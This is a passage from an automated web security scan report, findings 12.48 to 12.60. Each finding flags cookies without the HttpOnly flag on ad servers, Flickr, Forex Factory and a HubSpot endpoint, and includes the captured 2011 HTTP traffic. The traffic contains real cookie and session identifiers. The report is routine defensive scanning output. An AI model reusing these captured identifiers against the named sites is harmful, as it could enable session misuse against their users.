The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; /PC=0

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Location: http://origin-www.burstnet.akadns.net/gifs/zero.gif
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:14:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TID=16vda0204fei8g; path=/; expires=Mon, 12-Sep-2011 00:14:58 GMT; domain=.burstnet.com
Set-Cookie: /VTS.12067=2ujLG.yIpQ; path=/
Set-Cookie: /ad21868.12067=,CFC,GFC; path=/
Content-Length: 658

HTTP/1.1 302 Found
Date: Tue, 14 Jun 2011 00:14:58 GMT
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: TI
...[SNIP]...
12.48. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; /VTS.12067=2ujLG.yIpQ; /ad21868.12067=,CFC,GFC; /SO=:463:; /ad21868.12106=,CFC,GFC; /PC=2; /SC=2-33A.2

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:19:27 GMT
Content-Length: 137
Connection: close
Set-Cookie: /ad21868.12106=,CFC,GFC; path=/
Set-Cookie: /PC=3; path=/; expires=Tue, 21-Jun-2011 00:19:26 GMT
Set-Cookie: /SC=3-33A.3; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90\"></SCR'+'IPT>');

12.49. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; /VTS.12067=2ujLG.yIpQ; /ad21868.12067=,CFC,GFC; /ad21868.12106=,CFC,GFC; /SO=:463:; /PC=1; /SC=1-33A.1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:18:14 GMT
Content-Length: 137
Connection: close
Set-Cookie: /ad21868.12106=,CFC,GFC; path=/
Set-Cookie: /PC=2; path=/; expires=Tue, 21-Jun-2011 00:18:13 GMT
Set-Cookie: /SC=2-33A.2; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90\"></SCR'+'IPT>');

12.50. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; /SO=:463:; /ad21868.12106=,CFC,GFC; /PC=3; /SC=3-33A.3; /VTS.12067=2ujXm.pD3Q; /ad21868.12067=,CFC,GFC

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:28:12 GMT
Content-Length: 138
Connection: close
Set-Cookie: /ad21868.11567=,CFC,GFC; path=/
Set-Cookie: /PC=4; path=/; expires=Tue, 21-Jun-2011 00:28:12 GMT
Set-Cookie: /SC=4-33A.3^2vc.1; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=374650/site=mtv.mtvi/aamsz=300x250\"></SCR'+'IPT>');

12.51. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; /PC=0; TID=16vda0204fei8g; /VTS.12067=2ujLG.yIpQ; /ad21868.12067=,CFC,GFC

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:15:07 GMT
Content-Length: 529
Connection: close
Set-Cookie: /ad21868.12106=,CFC,GFC; path=/
Set-Cookie: /SO=:463:; path=/
Set-Cookie: /PC=1; path=/; expires=Tue, 21-Jun-2011 00:15:06 GMT
Set-Cookie: /SC=1-33A.1; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90\"></SCR'+'IPT>');

document.write('<img src="http://b.scorecardresearch.com/b?C1=8
...[SNIP]...
12.52. http://www.flickr.com/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /about/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:29 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:29 GMT; path=/; domain=.flickr.com
X-Served-By: www14.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r23.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r22.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 70254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>About Flickr</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta na
...[SNIP]...
12.53. http://www.flickr.com/abuse/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /abuse/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /abuse/ HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/report_abuse.gne
Content-Length: 66
Cache-Control: max-age=0
Origin: http://www.flickr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

goback=http%3A%2F%2Fwww.flickr.com%2Fabout%2F&abusecat=abuse_other

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:44 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:24:44 GMT; path=/; domain=.flickr.com
X-Served-By: www69.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r11.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r20.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 56237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>Flickr: Report Abuse</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
...[SNIP]...
12.54. http://www.flickr.com/beacon_page_timings.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /beacon_page_timings.gne

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacon_page_timings.gne?page_start=1308010986257&head_end=1308010987732&body_start=1308010987740&page_end=1308010987761&head_js_start=1308010986259&head_js_end=1308010987722&head_css_start=1308010987722&head_css_end=1308010987732&photo_start=undefined&photo_end=undefined&dom_ready=1308010987762&window_load=1308010995917&page_generation=849&image_count=26&dom_script_external_count=3&dom_script_inline_count=5&is_logged_in=0&is_pro=undefined&is_owner=false&js_assets_start=1308010987751&js_assets_end=1308010987751&timing_pageid=soup&js_done=1308010992746&seed_fetch_start=1308010986266&seed_fetch_end=1308010987722&js_done_chrome=1308010992746 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:16 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:16 GMT; path=/; domain=.flickr.com
X-Served-By: www133.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r08.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r24.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 0

12.55. http://www.flickr.com/flanal_event.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /flanal_event.gne

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flanal_event.gne?target=flickr.soup.pv&title=test_pvs_x1&rand=0.7009030901826918 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; localization=en-us%3Bus%3Bus; fl_v=souhp

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:13 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:13 GMT; path=/; domain=.flickr.com
X-Served-By: www105.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r15.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r21.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 0

12.56. http://www.flickr.com/fragment.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /fragment.gne

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fragment.gne?name=inc_language_selector HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:13 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:13 GMT; path=/; domain=.flickr.com
X-Served-By: www116.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r21.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r22.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 1481

       <ul>
           <li><a href="/change_language.gne?lang=zh-hk&magic_cookie=627772737f8cc7615c9c893fe0d08b9d" class="image_link" id="lang_zh-hk"><img src="http://l.yimg.com/g/images/spaceout.gif" width="45" h
...[SNIP]...
12.57. http://www.flickr.com/report_abuse.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /report_abuse.gne

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /report_abuse.gne HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/about/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:44 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:44 GMT; path=/; domain=.flickr.com
X-Served-By: www23.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r20.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r13.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 53534

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>Flickr: Report Abuse</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
...[SNIP]...
12.58. http://www.flickr.com/signin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /signin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin?popup=1&redir=/photo_grease_postlogin.gne?d=http://www.flickr.com/report_abuse.gne HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/report_abuse.gne
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 302 Found
Date: Tue, 14 Jun 2011 00:23:49 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:49 GMT; path=/; domain=.flickr.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:23:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
location: https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=us&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dus%26.done%3Dhttp%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne
X-Served-By: www142.flickr.mud.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r25.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r17.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 0

12.59. http://www.forexfactory.com/excal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /excal.php?do=fetchcss&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=407.52568085398525 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:01:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: ffsessionhash=f4bf7286639f1eb8531a1e8b00c74e68; path=/; domain=.forexfactory.com; HttpOnly
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:01:48 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:01:48 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2361
Content-Type: text/css

#_s_ff_syn {
background: transparent;
margin: 0;
padding: 0;
height: 100%;
}

#wscal_parent * { margin: 0 padding: 0;}

.bigusername { font-size: 14pt; }

.wscal_vbmenu_popup
{
   backgroun
...[SNIP]...
12.60. http://yadvertisingblog.app3.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yadvertisingblog.app3.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: yadvertisingblog.app3.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 14 Jun 2011 00:20:27 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
